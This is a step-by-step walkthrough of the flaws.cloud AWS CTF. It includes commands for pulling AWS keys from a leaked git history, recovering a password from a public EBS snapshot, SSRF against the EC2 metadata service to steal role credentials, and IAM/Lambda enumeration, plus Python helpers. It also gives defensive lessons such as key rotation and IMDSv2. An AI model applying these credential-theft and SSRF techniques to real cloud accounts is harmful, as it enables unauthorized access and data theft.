flaws.cloud Cloud CTF walkthrough (minimal)

Level 1

  1. dig flaws.cloud
    - get one of the IPs
  2. nslookup [IP] or python3 isitonaws.py [IP]
    - the reverse lookup ends in s3-website-us-west-2.amazonaws.com, so the site is an S3 static website in us-west-2 --> flaws.cloud.s3-website-us-west-2.amazonaws.com
    - S3 website hosting requires the bucket name to match the hostname, so the bucket is called flaws.cloud
  3. aws s3 ls s3://flaws.cloud --no-sign-request --region us-west-2
    - works without credentials because the bucket allows listing by Everyone; --no-sign-request keeps whatever keys you have configured out of the request
    - Result:
    2017-03-14 03:00:38       2575 hint1.html
    2017-03-03 04:05:17       1707 hint2.html
    2017-03-03 04:05:11       1101 hint3.html
    2020-05-22 18:16:45       3162 index.html
    2018-07-10 16:47:16      15979 logo.png
    2017-02-27 01:59:28         46 robots.txt
    2017-02-27 01:59:30       1051 secret-dd02c7c.html
  4. Visit http://flaws.cloud/secret-dd02c7c.html
    - the file is unlinked, not protected: once the bucket can be listed, every object name is discoverable, robots.txt or not

Level 2

  1. Same as level 1 (find the level 2 bucket from the level 1 secret page and list it), except that this bucket grants listing to the "Authenticated Users" group, which means any AWS account at all, not accounts the owner trusts
    - so you need to run aws s3 ls with your own AWS credentials (drop --no-sign-request); anyone with a free AWS account qualifies

Level 3

  1. aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --no-sign-request --region us-west-2
    - the listing contains a .git/ directory: the whole repository, history included, was synced into the bucket
  2. aws s3 cp --recursive --no-sign-request s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ flaws-lvl3-git
  3. cd flaws-lvl3-git
  4. git log
    - the history shows that something was committed and then removed; note the commit hash b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
  5. git show b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526
    - the diff still contains the credentials; deleting a secret in a later commit does not remove it from history
    - access_key=AKIAJ366LIPB4IJKT7SA
    - secret_access_key=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
  6. AWS_ACCESS_KEY_ID=AKIAJ366LIPB4IJKT7SA AWS_SECRET_ACCESS_KEY=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 aws s3 ls
    - the keys are still valid and list every bucket in their account, including:
    - level4-1156739cfb264ced6de514971a4bef68.flaws.cloud
    - (AWS_ACCESS_KEY_ID=... AWS_SECRET_ACCESS_KEY=... aws sts get-caller-identity shows which account and user the keys belong to)
    - lesson: a key that ever touched a repository has to be rotated, not just deleted from the tree
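The level 3 find, automated. This is an added example for this walkthrough, not code from flaws.cloud: it scans the text that `git log -p --all` prints for AWS access key IDs and labelled secret keys, and reports whether each one was last added or last removed (a removed one is still in history). The embedded log is a constructed sample shaped like the level 3 history; the commit hashes are made up and the credentials are AWS's documented example values.

```python
"""Find AWS access keys anywhere in a repository's history.

Added example for this walkthrough, not code from flaws.cloud. It reads the
text that `git log -p --all` prints; the sample below is constructed to look
like the level 3 history and uses AWS's documented example credentials.

Usage on a real checkout:  git log -p --all | python3 scan_git_keys.py
"""
import re
import sys

# Long-term key IDs start with AKIA, temporary (STS) ones with ASIA; 20 chars total.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
# A 40-char secret is too generic to grep for on its own, so require a telling
# name in front of it (secret_access_key, SecretAccessKey, secret-key, ...).
SECRET_RE = re.compile(
    r"(?i)secret[_-]?(?:access[_-]?)?key\s*[=:]?\s*['\"]?([A-Za-z0-9/+]{40})"
)
COMMIT_RE = re.compile(r"^commit ([0-9a-f]{7,40})")

# Constructed sample: the newest commit deletes the key file that the first
# commit added. Hashes are made up; the credentials are AWS's example values.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
Author: dev <dev@example.com>
Date:   Mon Sep 18 12:00:00 2017 +0000

    Oops, accidentally added something I shouldn't have

diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAIOSFODNN7EXAMPLE
-secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

commit 2222222222222222222222222222222222222222
Author: dev <dev@example.com>
Date:   Sun Sep 17 12:00:00 2017 +0000

    first commit

diff --git a/access_keys.txt b/access_keys.txt
new file mode 100644
--- /dev/null
+++ b/access_keys.txt
@@ -0,0 +1,2 @@
+access_key AKIAIOSFODNN7EXAMPLE
+secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
"""


def scan_git_log(log_text):
    """Return (commit, change, kind, value) for every credential-looking diff line.

    change is '+' if the commit added the line and '-' if it removed it. Both
    are reported on purpose: a secret deleted in a later commit is still
    sitting in the object store of every clone.
    """
    findings = []
    commit = None
    for line in log_text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit = m.group(1)
            continue
        # Only +/- diff body lines carry file content; skip the ---/+++ file headers.
        if not line or line[0] not in "+-" or line.startswith(("+++", "---")):
            continue
        change, body = line[0], line[1:]
        for key in ACCESS_KEY_RE.findall(body):
            findings.append((commit, change, "access_key_id", key))
        for secret in SECRET_RE.findall(body):
            findings.append((commit, change, "secret_access_key", secret))
    return findings


def summarize(findings):
    """Map each value to its most recent change.

    `git log` lists commits newest first, so the first time a value shows up
    is its latest change: '-' means removed from the tree but still in
    history, '+' means it is still present at that commit.
    """
    latest = {}
    for commit, change, kind, value in findings:
        latest.setdefault(value, {"kind": kind, "commit": commit, "last_change": change})
    return latest


def main():
    text = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin.read()
    for value, info in summarize(scan_git_log(text)).items():
        state = "REMOVED BUT IN HISTORY" if info["last_change"] == "-" else "PRESENT"
        print(f"{info['kind']:18} {value}  {state} (last touched in {(info['commit'] or '?')[:12]})")


if __name__ == "__main__":
    main()
```

The secret pattern deliberately needs a variable name in front of the 40-character value; matching bare 40-character strings across a whole history produces far more noise than hits. Run it against any repository before it is pushed anywhere, and treat every hit as a key to rotate, whatever its state.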

Level 4

  1. AWS_ACCESS_KEY_ID=AKIAJ366LIPB4IJKT7SA AWS_SECRET_ACCESS_KEY=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 aws ec2 describe-snapshots --owner-ids self --region us-west-2
    - lists the EBS snapshots owned by the account behind the level 3 keys
    - find snap-0b49342abd1bdcb89; it has been shared publicly, which is why the next step works from your own account
  2. aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
    - with your own profile (your own account, not the leaked keys)
    - attach the new volume to an EC2 instance of yours in the same AZ, us-west-2a (aws ec2 attach-volume --region us-west-2 --volume-id [vol-id] --instance-id [instance-id] --device /dev/sdb); on Xen-based instance types it shows up as /dev/xvdb, on Nitro ones as an nvme device, so confirm with lsblk
  3. ssh ubuntu@ec2-[us-west-2-ec2-IP].us-west-2.compute.amazonaws.com
  4. Mount the first partition of the volume (here /dev/xvdb1)
    - sudo mkdir -p /mountpoint && sudo mount /dev/xvdb1 /mountpoint
  5. Find /mountpoint/home/ubuntu/setupNginx.sh
    - content: htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
    - the basic-auth password was passed on the command line in the setup script, so it sits in plaintext on the disk image (and the same image holds /etc/nginx/.htpasswd)
  6. Login to http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud with flaws:nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Level 5

  1. Check http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/
    - the site proxies arbitrary URLs, and 169.254.169.254 is the EC2 instance metadata service (IMDS), which is only meant to be reachable from the instance itself; the proxy turns that into SSRF
  2. Find your way to http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
    - /latest/meta-data/iam/security-credentials/ lists the role name (flaws); the path with the role name returns its temporary credentials as JSON: AccessKeyId, SecretAccessKey, Token and Expiration
  3. Put the keys and the token in ~/.aws/credentials under the profile name [level5]: aws_access_key_id, aws_secret_access_key and aws_session_token
    - the token is not optional: role credentials are temporary and every API call is rejected without it; they also stop working at the Expiration time, after which you fetch them again through the proxy
  4. aws --profile level5 s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
  5. The listing shows the secret directory ddcc78ff/; open http://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/
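Step 3 is where people stumble (the token ends up missing, or the credentials have already expired), so here is the conversion as a small script. This is an added example for this walkthrough, not code from flaws.cloud: it takes the JSON that IMDS returns for an instance role, checks it, checks the expiry, and prints a ~/.aws/credentials section. The embedded response is a constructed sample in the shape IMDS returns from /latest/meta-data/iam/security-credentials/[role-name], filled with AWS's documented example credentials; the profile name level5 is the one used above.

```python
"""Turn an EC2 instance-role credential response into an AWS CLI profile.

Added example for this walkthrough, not code from flaws.cloud. The JSON below
is a constructed sample in the shape IMDS returns from
/latest/meta-data/iam/security-credentials/<role-name>, filled with AWS's
documented example credentials. With the real response saved from level 5:
    python3 imds_to_profile.py < response.json >> ~/.aws/credentials
"""
import json
import sys
from datetime import datetime, timezone

SAMPLE_IMDS_RESPONSE = """{
  "Code" : "Success",
  "LastUpdated" : "2099-01-01T00:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAIOSFODNN7EXAMPLE",
  "SecretAccessKey" : "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token" : "IQoJb3JpZ2luX2VjEXAMPLESESSIONTOKEN",
  "Expiration" : "2099-01-01T06:00:00Z"
}"""


def parse_timestamp(text):
    """IMDS timestamps look like 2017-05-17T15:09:54Z; return an aware UTC datetime."""
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_imds_credentials(raw):
    """Validate the response and return its fields with Expiration parsed."""
    data = json.loads(raw)
    if data.get("Code") != "Success":
        raise ValueError(f"IMDS did not return credentials: {data.get('Code')!r}")
    missing = [k for k in ("AccessKeyId", "SecretAccessKey", "Token", "Expiration") if k not in data]
    if missing:
        raise ValueError(f"response is missing {missing}")
    return {
        "AccessKeyId": data["AccessKeyId"],
        "SecretAccessKey": data["SecretAccessKey"],
        "Token": data["Token"],
        "Expiration": parse_timestamp(data["Expiration"]),
    }


def is_temporary(creds):
    """Key IDs issued by STS start with ASIA; long-term IAM user keys with AKIA."""
    return creds["AccessKeyId"].startswith("ASIA")


def to_credentials_profile(creds, profile="level5"):
    """Render a ~/.aws/credentials section. Role credentials are temporary, so
    the session token line is mandatory: the key pair alone is rejected."""
    return "\n".join([
        f"[{profile}]",
        f"aws_access_key_id = {creds['AccessKeyId']}",
        f"aws_secret_access_key = {creds['SecretAccessKey']}",
        f"aws_session_token = {creds['Token']}",
        "",
    ])


def seconds_until_expiry(creds, now=None):
    """Positive while the credentials are still usable; re-fetch when <= 0."""
    now = now or datetime.now(timezone.utc)
    return (creds["Expiration"] - now).total_seconds()


def main():
    raw = SAMPLE_IMDS_RESPONSE if sys.stdin.isatty() else sys.stdin.read()
    creds = parse_imds_credentials(raw)
    left = seconds_until_expiry(creds)
    if left <= 0:
        sys.exit(f"credentials expired {-left:.0f}s ago; fetch them again through the proxy")
    sys.stdout.write(to_credentials_profile(creds))


if __name__ == "__main__":
    main()
```

The reason the proxy trick works at all is that the instance serves IMDSv1, which answers plain GET requests. With IMDSv2 enforced (HttpTokens=required on the instance) a client must first PUT to /latest/api/token with an X-aws-ec2-metadata-token-ttl-seconds header and send the returned token on every metadata request, which a GET-forwarding proxy cannot do; that is the fix for this class of SSRF.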

Level 6

Enumeration

  The keys for this level are given on the level 6 page; export them once so the commands below stay readable:
  export AWS_ACCESS_KEY_ID=AKIAJFQ6E7BY57Q3OBGA AWS_SECRET_ACCESS_KEY=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 AWS_DEFAULT_REGION=us-west-2

  1. aws iam list-users
    - list the users in this account
    - users: backup and Level6
  2. aws iam list-attached-user-policies --user-name Level6
    - managed policies attached to Level6:
    - arn:aws:iam::975426262029:policy/MySecurityAudit
    - arn:aws:iam::975426262029:policy/list_apigateways
  3. aws iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
    - metadata of the custom policy list_apigateways; the permissions live in its default version: "DefaultVersionId": "v4"
  4. aws iam get-policy-version --version-id v4 --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
    - the policy document itself:
    - "Action": "apigateway:GET"
    - "Resource": "arn:aws:apigateway:us-west-2::/restapis/*"
    - i.e. read-only access to every REST API in us-west-2 (the lambda calls below are therefore covered by MySecurityAudit, the only other policy)
    - an API Gateway REST API usually fronts a Lambda function, so look for the function next
  5. aws lambda list-functions
    - find function Level6
  6. aws lambda get-policy --function-name Level6
    - the function's resource policy lets apigateway.amazonaws.com invoke it when the source is arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6
    - execute-api ARN format: arn:aws:execute-api:[region]:[account]:[restapi-id]/[stage]/[method]/[path]; here the stage is a wildcard, the method GET, the path /level6
    - REST API invoke URL format: https://[restapi-id].execute-api.[region].amazonaws.com/[stage]/[path]
    - in our case: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/
    - https://s33ppypa75.execute-api.us-west-2.amazonaws.com/level6 returns 403 Forbidden: the stage name is part of the URL and the wildcard in the policy does not tell us what it is
  7. aws apigateway get-stages --rest-api-id s33ppypa75
    - "stageName": "Prod"
    - i.e. https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
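Steps 6 and 7 as code, going from the Lambda resource policy to the URL that invokes it. This is an added example for this walkthrough, not code from flaws.cloud: it parses the output shapes of aws lambda get-policy (whose "Policy" field is a JSON document encoded as a string) and aws apigateway get-stages, splits the execute-api ARN into its parts, and builds the invoke URL for every stage when the ARN's stage is a wildcard. The two embedded responses are constructed samples using the ARN and stage name from this level; the statement Sid and RevisionId in them are made up.

```python
"""From a Lambda resource policy to the API Gateway URL that invokes it.

Added example for this walkthrough, not code from flaws.cloud. The two
samples below are constructed in the output shapes of
`aws lambda get-policy` and `aws apigateway get-stages`, using the level 6
ARN and stage name; the Sid and RevisionId values are made up.
"""
import json
import re

# arn:aws:execute-api:<region>:<account>:<api-id>/<stage>/<method>/<path>
EXECUTE_API_ARN_RE = re.compile(
    r"^arn:aws:execute-api:(?P<region>[a-z0-9-]+):(?P<account>\d{12}):"
    r"(?P<api_id>[a-z0-9]+)/(?P<stage>[^/]+)/(?P<method>[A-Z*]+)(?P<path>/.*)?$"
)

# Constructed sample of `aws lambda get-policy --function-name Level6`.
SAMPLE_GET_POLICY = json.dumps({
    "Policy": json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "apigateway-invoke",
            "Effect": "Allow",
            "Principal": {"Service": "apigateway.amazonaws.com"},
            "Action": "lambda:InvokeFunction",
            "Resource": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
            "Condition": {"ArnLike": {"AWS:SourceArn":
                "arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"}},
        }],
    }),
    "RevisionId": "00000000-0000-0000-0000-000000000000",
})

# Constructed sample of `aws apigateway get-stages --rest-api-id s33ppypa75`.
SAMPLE_GET_STAGES = json.dumps({"item": [{"deploymentId": "abc123", "stageName": "Prod"}]})


def source_arns_from_lambda_policy(raw):
    """Every execute-api source ARN that an Allow statement lets invoke the function."""
    policy = json.loads(json.loads(raw)["Policy"])   # "Policy" is a JSON string
    arns = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        for block in stmt.get("Condition", {}).values():   # ArnLike, ArnEquals, ...
            src = block.get("AWS:SourceArn")
            if src is None:
                continue
            for arn in ([src] if isinstance(src, str) else src):
                if arn.startswith("arn:aws:execute-api:"):
                    arns.append(arn)
    return arns


def parse_execute_api_arn(arn):
    """Split an execute-api ARN into region, account, api_id, stage, method, path."""
    m = EXECUTE_API_ARN_RE.match(arn)
    if not m:
        raise ValueError(f"not an execute-api ARN: {arn}")
    parts = m.groupdict()
    parts["path"] = parts["path"] or "/"
    return parts


def stages_from_get_stages(raw):
    """Stage names from `aws apigateway get-stages` output."""
    return [item["stageName"] for item in json.loads(raw)["item"]]


def invoke_urls(arn, stages):
    """URLs to try. A '*' stage in the ARN lets any stage invoke the function,
    so the real stage names have to come from get-stages."""
    p = parse_execute_api_arn(arn)
    host = f"https://{p['api_id']}.execute-api.{p['region']}.amazonaws.com"
    candidates = stages if p["stage"] == "*" else [p["stage"]]
    return [f"{host}/{stage}{p['path']}" for stage in candidates]


if __name__ == "__main__":
    stages = stages_from_get_stages(SAMPLE_GET_STAGES)
    for arn in source_arns_from_lambda_policy(SAMPLE_GET_POLICY):
        print(arn)
        for url in invoke_urls(arn, stages):
            print("  ", url)
```

Feed the real outputs in by saving them to files and loading those instead of the samples; with the stage list in hand the 403 from step 6 turns into the list of URLs worth requesting.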